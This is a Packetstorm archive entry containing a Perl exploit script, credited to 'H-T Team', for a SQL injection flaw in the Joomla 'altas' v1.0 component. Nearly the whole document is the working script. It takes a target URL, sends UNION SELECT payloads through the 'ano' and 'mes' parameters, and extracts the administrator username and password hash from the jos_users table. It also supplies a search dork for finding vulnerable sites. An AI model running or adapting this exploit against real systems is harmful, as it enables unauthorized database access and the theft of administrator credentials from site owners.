joomlaaltas-sql.txt

2008-07-10T00:00:00
ID PACKETSTORM:67986
Type packetstorm
Reporter H-T Team
Modified 2008-07-10T00:00:00

Description

                                        
                                            `#!/usr/bin/perl -w  
  
# Joomla Component altas v 1.0 Multiple Remote SQL Injection  
# variables vuln : ( ano ) & ( mes )   
  
#[*] Found by : Houssamix From H-T Team   
  
#[*] H-T Team [ HouSSaMix + ToXiC350 ]   
#[*] Greetz : Islamic Security Team & and all musulmans hackers  
  
#[*] Component_Name: altas  
#[*] Script_Name: Joomla  
#[*] Dork : index.php?option=com_altas  
  
# <name>altas</name>  
# <creationDate>10/09/2007</creationDate>  
# <author>Ilimitada Hosting Co.</author>  
# <copyright>(c) 2007</copyright>  
# <authorEmail>soporte@ilihost.com</authorEmail>  
# <authorUrl>www.ilihost.com</authorUrl>  
# <version>1.0</version>  
  
system("color f");  
print "\t\t========================================================\n\n";  
print "\t\t# Viva Islam #\n\n";  
print "\t\t========================================================\n\n";  
print "\t\t# Joomla Component altas v 1 multiple SQL Injection #\n\n";  
print "\t\t========================================================\n\n";  
print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n";  
print "\t\t========================================================\n\n";  
  
use LWP::UserAgent;  
  
print "\nEnter your Target (http://site.com/joomla/): ";  
chomp(my $target=<STDIN>);  
  
$uname="username";  
$magic="jos_users";  
  
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";  
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');  
  
$host = $target . "index.php?option=com_altas&mes=hsmx&ano=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8 from/**/".$magic."/**";  
$res = $b->request(HTTP::Request->new(GET=>$host));  
$answer = $res->content;  
  
print "\n[+] The Target : ".$target."";  
  
if ($answer =~ /<user>(.*?)<user>/){  
  
print "\n[+] Admin User : $1";  
}  
$host2 = $target . "index.php?option=com_altas&mes=-1%20union%20select%201,2,password,4,5,6,7,8/**/from/**/jos_users--";  
$res2 = $b->request(HTTP::Request->new(GET=>$host2));  
$answer = $res2->content;  
if ($answer =~/([0-9a-fA-F]{32})/){  
print "\n[+] Admin Hash : $1\n\n";  
print "# Exploit succeed! #\n\n";  
}  
else{print "\n[-] Exploit Failed...\n";  
}  
  
# coded by Houssamix From H-T Team  
  
`